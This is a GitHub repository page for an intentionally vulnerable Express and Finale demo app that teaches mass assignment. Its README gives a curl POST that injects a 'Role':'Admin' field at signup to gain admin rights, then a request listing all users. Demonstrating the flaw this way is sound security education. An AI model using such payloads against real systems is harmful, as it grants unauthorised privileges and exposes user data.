Skip to content
/ mass-assignment-express-finale Public

This application is a demonstration prototype just to show how to perform Mass Assignment attack.

License

MIT license
0 stars 0 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

0xdbe-appsec/mass-assignment-express-finale

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

4 Commits
bin
bin
 
 
config
config
 
 
migrations
migrations
 
 
models
models
 
 
public
public
 
 
routes
routes
 
 
.gitignore
.gitignore
 
 
LICENSE
LICENSE
 
 
README.md
README.md
 
 
app.js
app.js
 
 
package-lock.json
package-lock.json
 
 
package.json
package.json
 
 

Repository files navigation

Mass Assignment with Express and Finale

This application is a demonstration prototype just to show how to perform Mass Assignment attack.

Setup

  • Install
npm install
  • Init database
NODE_ENV="dev" npx sequelize-cli db:migrate
  • Run
NODE_ENV="dev" npm start

Usage

  • Signup as Visitor
DATA='{"Login":"hobbit","firstName":"Frodon","lastName":"Sacquet"}'

curl --header "Content-Type: application/json" \
  --request POST \
  --data $DATA \
  http://localhost:3000/users

Look into the HTTP response: How to exploit Mass Assignment Attack ?

Hack

  • Signup as Admin (using Mass Assignment Attack)
DATA='{"Login":"pwned","firstName":"pwned","lastName":"pwned","Role":"Admin"}'

curl --header "Content-Type: application/json" \
  --request POST \
  --data $DATA \
  http://localhost:3000/users
  • Get all users
curl http://localhost:3000/users | jq

About

This application is a demonstration prototype just to show how to perform Mass Assignment attack.

Resources

Readme

License

MIT license
Activity
Custom properties

Stars

0 stars

Watchers

1 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages